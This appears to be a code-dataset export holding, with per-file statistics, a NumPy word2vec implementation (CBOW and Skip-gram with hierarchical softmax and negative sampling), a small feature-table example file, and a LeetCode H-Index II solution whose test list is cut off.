self.W1 = np.random.uniform(-1, 1, (len(self.vocab), self.vector_dim)) # V x N
if self.hierarchical_softmax:
self.tree = Huffman_tree(self.vocab, dim=self.vector_dim)
else:
self.W2 = np.random.uniform(-1, 1, (len(self.vocab), self.vector_dim)) # N x V
if negative_sampling:
self.sampler=NEG(vocab=self.vocab, alpha=0.75, size=size, subsampling = self.subsampling, subsample_thr = self.subsample_thr)
def train(self, corpus: str, window_size: int, train_epoch: int, learning_rate: float, save_path: str = None):
dataset = Dataset(corpus, window_size, "CBOW")
for epoch in range(1, train_epoch + 1):
start_time = time.time()
avg_loss = self.train_one_epoch(dataset, learning_rate)
end_time = time.time()
print(f"Epoch {epoch}, loss: {avg_loss:.2f}. Cost {(end_time - start_time) / 60:.1f} min",file=self.log,flush=True)
if save_path is not None:
self.save_model(save_path)
def train_one_epoch(self, dataset: Dataset, learning_rate: float):
steps, total_loss = 0, 0.0
for steps, sample in enumerate(iter(dataset), start=1):
context_tokens, target_token = sample
loss = self.train_one_step(steps,context_tokens, target_token, learning_rate)
total_loss += loss
if steps % 10000 == 0:
print(f"Step: {steps}. Avg. loss: {total_loss / steps: .2f}",file=self.log,flush=True)
return total_loss / steps
def train_one_step(self, step:int ,context_tokens: List[str], target_token: str, learning_rate: float) -> float:
"""
Predict the probability of the target token given context tokens.
:param context_tokens: List of tokens around the target token
:param target_token: Target (center) token
:param learning_rate: Learning rate of each step
:param hierarchical_softmax: whether use the hierarchical softmax technique
:param negative_sampling: whether use the negative sampling technique
:return: loss of the target token
"""
if self.hierarchical_softmax:
"""CBOW with hierarchical softmax"""
# ==== Construct one-hot vectors ====
context_ids = [self.vocab.token_to_idx(i) for i in context_tokens]
input_onehot = np.array(list(map(lambda x: one_hot(len(self.vocab), x), context_ids)))
# ==== Forward step ====
assert input_onehot.shape[-1] == self.W1.shape[0]
word_vector = input_onehot @ self.W1
word_vector = np.average(word_vector, axis=0)
target_id = self.vocab.token_to_idx(target_token)
target_path = self.tree.get_nodepath(target_id)
context_vector = np.array([target_path[i].vector for i in range(len(target_path)-1)])
context_one_hot = np.array([0 if target_path[i + 1].direction == 0 else 1 for i in range(len(target_path) - 1)])
logit = context_vector @ word_vector
output = sigmoid(logit)
# ==== Calculate loss ====
loss = -np.sum(np.log((-2 * context_one_hot + 1) * output + context_one_hot + 1e-8))
# ==== Update parameters ====
self.W1[context_ids] -= learning_rate * ((output - 1 + context_one_hot) @ context_vector) / len(context_tokens)
for j, node in enumerate(target_path):
if target_path[j].vector is not None:
target_path[j].vector -= learning_rate * (output[j] - 1 + context_one_hot[j]) * word_vector
elif self.negative_sampling:
"""CBOW with nagative sampling"""
# ==== Construct one-hot vectors ====
context_ids = [self.vocab.token_to_idx(i) for i in context_tokens]
input_onehot = np.array(list(map(lambda x: one_hot(len(self.vocab), x), context_ids)))
# ==== Forward step ====
assert input_onehot.shape[-1] == self.W1.shape[0]
word_vector = input_onehot @ self.W1
word_vector = np.average(word_vector, axis=0)
target_id = self.vocab.token_to_idx(target_token)
positive_logit = word_vector @ self.W2[target_id]
negative_ids = self.sampler.sample(target_id)
negative_logit = -self.W2[negative_ids] @ word_vector
positive_output = sigmoid(positive_logit)
negative_output = sigmoid(negative_logit)
# ==== Calculate loss ====
loss = -np.log(positive_output+1e-8)-np.sum(np.log(negative_output+1e-8))
# ==== Update parameters ====
self.W1[context_ids] -= learning_rate * ((positive_output-1) * self.W2[target_id]+(1-negative_output)@self.W2[negative_ids]) / len(context_ids)
self.W2[target_id] -= learning_rate * (positive_output-1) * word_vector
self.W2[negative_ids] -= learning_rate * np.outer(1-negative_output,word_vector)
else:
"""naive CBOW"""
# ==== Construct one-hot vectors ====
context_ids = [self.vocab.token_to_idx(i) for i in context_tokens]
input_onehot = np.array(list(map(lambda x: one_hot(len(self.vocab), x), context_ids)))
# ==== Forward step ====
assert input_onehot.shape[-1] == self.W1.shape[0]
word_vector = input_onehot @ self.W1
word_vector = np.average(word_vector, axis=0)
logit = self.W2 @word_vector
output = softmax(logit)
# ==== Calculate loss ====
target_id = self.vocab.token_to_idx(target_token)
loss = -np.log(output[target_id]+1e-8)
# ==== Update parameters ====
target_one_hot = one_hot(len(self.vocab), target_id)
self.W1[context_ids] -= learning_rate * (output @ self.W2 - self.W2[target_id]) / len(context_ids)
self.W2[:] -= learning_rate * np.outer(output - target_one_hot, word_vector)
return loss
def similarity(self, token1: str, token2: str):
""" Calculate cosine similarity of token1 and token2 """
v1 = self.W1[self.vocab.token_to_idx(token1)]
v2 = self.W1[self.vocab.token_to_idx(token2)]
v1 = v1 / np.linalg.norm(v1)
v2 = v2 / np.linalg.norm(v2)
return np.dot(v1, v2)
def most_similar_tokens(self, token: str, n: int):
""" Find the n words most similar to the given token """
norm_W1 = self.W1 / np.linalg.norm(self.W1, axis=1, keepdims=True)
idx = self.vocab.token_to_idx(token, warn=True)
v = norm_W1[idx]
cosine_similarity = np.dot(norm_W1, v)
nbest_idx = np.argsort(cosine_similarity)[-n:][::-1]
results = []
for idx in nbest_idx:
_token = self.vocab.idx_to_token(idx)
results.append((_token, cosine_similarity[idx]))
return results
def save_model(self, path: str):
""" Save model and vocabulary to `path` """
os.makedirs(path, exist_ok=True)
self.vocab.save_vocab(path)
with open(join(path, "cbow"+("_hierarchical" if self.hierarchical_softmax else "")
+("_neg" if self.negative_sampling else "")+ ("_sub" if self.subsampling else "") + ".pkl"), "wb") as f:
if self.hierarchical_softmax:
param = {"W1": self.W1, "tree": self.tree}
else:
param = {"W1": self.W1, "W2": self.W2}
pickle.dump(param, f)
print(f"Save model to {path}",file=self.log,flush=True)
@classmethod
def load_model(cls, path: str, hierarchical_softmax:bool= False, negative_sampling:bool= False,
size:int=10, subsampling:bool= False, subsample_thr:float= 1e-3):
""" Load model and vocabulary from `path` """
vocab = Vocab.load_vocab(path)
with open(join(path, "cbow" + ("_hierarchical" if hierarchical_softmax else "")
+ ("_neg" if negative_sampling else "") + ("_sub" if subsampling else "") + ".pkl"), "rb") as f:
param = pickle.load(f)
if hierarchical_softmax:
W1, tree = param["W1"], param["tree"]
model = cls(vocab, W1.shape[1], hierarchical_softmax=hierarchical_softmax, negative_sampling=negative_sampling, size=size, subsampling=subsampling,subsample_thr=subsample_thr)
model.W1, model.tree = W1, tree
else:
W1, W2 = param["W1"], param["W2"]
model = cls(vocab, W1.shape[1], hierarchical_softmax=hierarchical_softmax, negative_sampling=negative_sampling, size=size, subsampling=subsampling,subsample_thr=subsample_thr)
model.W1, model.W2 = W1, W2
print(f"Load model from {path}")
return model
class Skipgram:
def __init__(self, vocab: Vocab, vector_dim: int,hierarchical_softmax: bool=False, negative_sampling: bool=False, size: int=10, subsampling: bool=False, subsample_thr: float=1e-3):
self.vocab = vocab
self.vector_dim = vector_dim
self.hierarchical_softmax = hierarchical_softmax
self.negative_sampling = negative_sampling
self.subsampling = subsampling
self.subsample_thr = subsample_thr
os.makedirs("log", exist_ok=True)
self.log = open("log/skip-gram"+("_hierarchical" if self.hierarchical_softmax else "") + ("_neg" if self.negative_sampling else "")
+ ("_sub" if self.subsampling else "") + ".txt","a+")
self.W1 = np.random.uniform(-1, 1, (len(self.vocab), self.vector_dim)) # V x N
if self.hierarchical_softmax:
self.tree = Huffman_tree(self.vocab, dim=vector_dim)
else:
self.W2 = np.random.uniform(-1, 1, (len(self.vocab), self.vector_dim)) # N x V
if negative_sampling:
self.sampler = NEG(vocab=self.vocab, alpha=0.75, size=size, subsampling=self.subsampling, subsample_thr=self.subsample_thr)
def train(self, corpus: str, window_size: int, train_epoch: int, learning_rate: float, save_path: str = None):
dataset = Dataset(corpus, window_size, "skip-gram")
for epoch in range(1, train_epoch + 1):
start_time = time.time()
avg_loss = self.train_one_epoch(dataset, learning_rate)
end_time = time.time()
print(f"Epoch {epoch}, loss: {avg_loss:.2f}. Cost {(end_time - start_time) / 60:.1f} min",file=self.log,flush=True)
if save_path is not None:
self.save_model(save_path)
def train_one_epoch(self, dataset: Dataset, learning_rate: float):
steps, total_loss = 0, 0.0
for steps, sample in enumerate(iter(dataset), start=1):
context_tokens, target_token = sample
loss = self.train_one_step(context_tokens, target_token, learning_rate)
total_loss += loss
if steps % 10000 == 0:
print(f"Step: {steps}. Avg. loss: {total_loss / steps: .2f}",file=self.log,flush=True)
return total_loss / steps
def train_one_step(self, context_token: str, target_tokens: List[str], learning_rate: float) -> float:
"""
Predict the probability of the target token given context tokens.
:param context_token: Context (center) token
:param target_tokens: List of target tokens around the context token
:param learning_rate: Learning rate of each step
:return: loss of the target token
"""
if self.hierarchical_softmax:
"""skip-gram with hierarchical softmax"""
# ==== Construct one-hot vectors ====
context_id = self.vocab.token_to_idx(context_token)
input_onehot = one_hot(len(self.vocab),context_id)
# ==== Forward step ====
assert input_onehot.shape[0] == self.W1.shape[0]
word_vector = input_onehot @ self.W1
target_ids = [self.vocab.token_to_idx(i) for i in target_tokens]
target_path = [self.tree.get_nodepath(i) for i in target_ids]
loss = 0.0
target_gradient = []
for i,path in enumerate(target_path):
gradient = []
context_vector = np.array([path[i].vector for i in range(len(path)-1)])
context_one_hot = np.array([0 if path[i+1].direction==0 else 1 for i in range(len(path)-1)])
logit = context_vector @ word_vector
output = sigmoid(logit)
# ==== Calculate loss ====
loss += -np.sum(np.log((-2*context_one_hot + 1) * output + context_one_hot + 1e-8))/len(target_tokens)
# ==== Update parameters ====
self.W1[target_ids[i]] -= learning_rate * ((output - 1 + context_one_hot) @ context_vector)/len(target_tokens)
for j, node in enumerate(path):
if path[j].vector is not None:
gradient.append((output[j] - 1 + context_one_hot[j]) * word_vector/len(target_tokens))
target_gradient.append(gradient)
for i, path in enumerate(target_path):
for j, node in enumerate(path):
if path[j].vector is not None:
path[j].vector -= learning_rate * target_gradient[i][j]
elif self.negative_sampling:
# ==== Construct one-hot vectors ====
context_id = self.vocab.token_to_idx(context_token)
input_onehot = one_hot(len(self.vocab), context_id)
# ==== Forward step ====
assert input_onehot.shape[0] == self.W1.shape[0]
word_vector = input_onehot @ self.W1
target_ids = [self.vocab.token_to_idx(i) for i in target_tokens]
loss = 0.0
for i in target_ids:
negative_ids = self.sampler.sample(i)
positive_logit = word_vector @ self.W2[i]
negative_logit = -self.W2[negative_ids] @ word_vector
positive_output = sigmoid(positive_logit)
negative_output = sigmoid(negative_logit)
# ==== Calculate loss ====
loss += (-np.log(positive_output+1e-8)-np.sum(np.log(negative_output+1e-8)))/len(target_ids)
# ==== Update parameters ====
self.W1[context_id] -= learning_rate*(self.W2[i]*(positive_output-1)+(1-negative_output)@self.W2[negative_ids])/len(target_tokens)
self.W2[i] -= learning_rate*word_vector*(positive_output-1)/len(target_tokens)
self.W2[negative_ids] -= learning_rate*np.outer(1-negative_output,word_vector)/len(target_tokens)
else:
# ==== Construct one-hot vectors ====
context_id = self.vocab.token_to_idx(context_token)
input_onehot = one_hot(len(self.vocab), context_id)
# ==== Forward step ====
assert input_onehot.shape[0] == self.W1.shape[0]
word_vector = input_onehot @ self.W1
logit = self.W2 @ word_vector
output = softmax(logit)
target_ids = [self.vocab.token_to_idx(i) for i in target_tokens]
# ==== Calculate loss ====
loss = np.average(-np.log(output[target_ids]+1e-8))
# ==== Update parameters ====
W1_grad = np.zeros(self.W1.shape)
W1_grad[context_id] += -np.average(self.W2[target_ids], axis=0) + output @ self.W2
W2_grad = np.outer(output, word_vector)
W2_grad[target_ids] -= np.expand_dims(word_vector, axis=0) / len(target_ids)
assert list(W1_grad.shape) == list(self.W1.shape)
assert list(W2_grad.shape) == list(self.W2.shape)
self.W1[:] -= learning_rate * W1_grad
self.W2[:] -= learning_rate * W2_grad
return loss
def similarity(self, token1: str, token2: str):
""" Calculate cosine similarity of token1 and token2 """
v1 = self.W1[self.vocab.token_to_idx(token1)]
v2 = self.W1[self.vocab.token_to_idx(token2)]
v1 = v1 / np.linalg.norm(v1)
v2 = v2 / np.linalg.norm(v2)
return np.dot(v1, v2)
def most_similar_tokens(self, token: str, n: int):
""" Find the n words most similar to the given token """
norm_W1 = self.W1 / np.linalg.norm(self.W1, axis=1, keepdims=True)
idx = self.vocab.token_to_idx(token, warn=True)
v = norm_W1[idx]
cosine_similarity = np.dot(norm_W1, v)
nbest_idx = np.argsort(cosine_similarity)[-n:][::-1]
results = []
for idx in nbest_idx:
_token = self.vocab.idx_to_token(idx)
results.append((_token, cosine_similarity[idx]))
return results
def save_model(self, path: str):
""" Save model and vocabulary to `path` """
os.makedirs(path, exist_ok=True)
self.vocab.save_vocab(path)
with open(join(path, "skip-gram" + ("_hierarchical" if self.hierarchical_softmax else "")
+ ("_neg" if self.negative_sampling else "") + ("_sub" if self.subsampling else "") + ".pkl"), "wb") as f:
if self.hierarchical_softmax:
param = {"W1": self.W1, "tree": self.tree}
else:
param = {"W1": self.W1, "W2": self.W2}
pickle.dump(param, f)
print(f"Save model to {path}",file=self.log,flush=True)
@classmethod
def load_model(cls, path: str, hierarchical_softmax:bool= False, negative_sampling:bool= False,
size:int= 10, subsampling:bool= False, subsample_thr:float= 1e-3):
""" Load model and vocabulary from `path` """
vocab = Vocab.load_vocab(path)
with open(join(path, "skip-gram" + ("_hierarchical" if hierarchical_softmax else "")
+ ("_neg" if negative_sampling else "") + ("_sub" if subsampling else "") + ".pkl"), "rb") as f:
param = pickle.load(f)
if hierarchical_softmax:
W1, tree = param["W1"], param["tree"]
model = cls(vocab, W1.shape[1], hierarchical_softmax=hierarchical_softmax, negative_sampling=negative_sampling, size=size, subsampling=subsampling, subsample_thr=subsample_thr)
model.W1, model.tree = W1, tree
else:
W1, W2 = param["W1"], param["W2"]
model = cls(vocab, W1.shape[1], hierarchical_softmax=hierarchical_softmax, negative_sampling=negative_sampling, size=size, subsampling=subsampling, subsample_thr=subsample_thr)
model.W1, model.W2 = W1, W2
print(f"Load model from {path}")
return model
| 49.977556
| 188
| 0.60486
| 2,621
| 20,041
| 4.435712
| 0.075544
| 0.031739
| 0.021676
| 0.024772
| 0.853604
| 0.824531
| 0.808791
| 0.805866
| 0.777482
| 0.755978
| 0
| 0.019502
| 0.270795
| 20,041
| 401
| 189
| 49.977556
| 0.776037
| 0.08757
| 0
| 0.711864
| 0
| 0.00678
| 0.0342
| 0
| 0
| 0
| 0
| 0
| 0.027119
| 1
| 0.064407
| false
| 0
| 0.033898
| 0
| 0.149153
| 0.027119
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
74b9d8ce2df4d8b8b944d3e7197504e0339b9aec
| 292
|
py
|
Python
|
concepts/_example.py
|
plpedrofeitosa/concepts
|
df1c4e139fef0f7ccff466f9c27024f6b7b4d1ef
|
[
"MIT"
] | 90
|
2015-03-24T20:09:14.000Z
|
2022-03-18T07:37:01.000Z
|
concepts/_example.py
|
plpedrofeitosa/concepts
|
df1c4e139fef0f7ccff466f9c27024f6b7b4d1ef
|
[
"MIT"
] | 18
|
2017-11-03T18:08:13.000Z
|
2022-02-05T10:10:24.000Z
|
concepts/_example.py
|
plpedrofeitosa/concepts
|
df1c4e139fef0f7ccff466f9c27024f6b7b4d1ef
|
[
"MIT"
] | 27
|
2015-01-23T13:00:57.000Z
|
2022-03-08T15:48:41.000Z
|
EXAMPLE = '''\
|+1|-1|+2|-2|+3|-3|+sg|+pl|-sg|-pl|
1sg| X| | | X| | X| X| | | X|
1pl| X| | | X| | X| | X| X| |
2sg| | X| X| | | X| X| | | X|
2pl| | X| X| | | X| | X| X| |
3sg| | X| | X| X| | X| | | X|
3pl| | X| | X| X| | | X| X| |
'''
| 29.2
| 38
| 0.236301
| 47
| 292
| 1.468085
| 0.276596
| 0.695652
| 0.782609
| 0.695652
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073171
| 0.438356
| 292
| 9
| 39
| 32.444444
| 0.347561
| 0
| 0
| 0
| 0
| 0.111111
| 0.941781
| 0.119863
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2d082f2b740d66d6a84e06f463e5ebb540865fec
| 29,655
|
py
|
Python
|
src/275. H-Index II.py
|
xiaonanln/myleetcode-python
|
95d282f21a257f937cd22ef20c3590a69919e307
|
[
"Apache-2.0"
] | null | null | null |
src/275. H-Index II.py
|
xiaonanln/myleetcode-python
|
95d282f21a257f937cd22ef20c3590a69919e307
|
[
"Apache-2.0"
] | null | null | null |
src/275. H-Index II.py
|
xiaonanln/myleetcode-python
|
95d282f21a257f937cd22ef20c3590a69919e307
|
[
"Apache-2.0"
] | null | null | null |
class Solution(object):
def hIndex(self, citations):
"""
:type citations: List[int]
:rtype: int
"""
L = len(citations)
if not L or citations[-1] == 0: return 0
i, j = 1, L
while i < j:
m = (i + j) // 2
if citations[L-m] == m or (citations[L-m] > m and citations[L-m-1] <= m):
return m
elif citations[L-m] < m:
j = m - 1
else: # citations[L-m] > m
i = m + 1
return i
# print Solution().hIndex([4, 4, 0, 0])
cits = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,3